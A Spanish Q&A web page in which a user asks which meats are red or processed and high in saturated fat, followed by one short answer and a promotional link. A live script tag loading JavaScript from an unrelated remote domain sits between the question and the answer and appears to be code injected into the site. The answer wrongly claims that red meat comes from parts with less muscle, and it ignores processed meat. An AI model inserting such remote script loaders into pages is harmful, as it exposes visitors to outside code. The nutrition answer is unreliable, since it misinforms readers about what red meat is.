Carnes rojas o procesadas

Hola. Me gustaría que me informara de cuáles son las carnes rojas o procesadas, es decir, las que aportan grasas saturadas, y que me aportara algunos ejemplos. Gracias.

<script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.getData"></script>

1 Respuesta

Respuesta

Las carnes rojas son las que proceden de partes del animal con menos cantidad de masa magra, es decir, con menos cantidad de músculo. Su color rojo fuerte es característico, la carne de vacuno y caprino suelen ser estas carnes, también algunas partes del cerdo y carnes de caza. El pollo no está considerado carne roja.

Desayuna bien, vive mejor: http://bit.ly/TEYLAe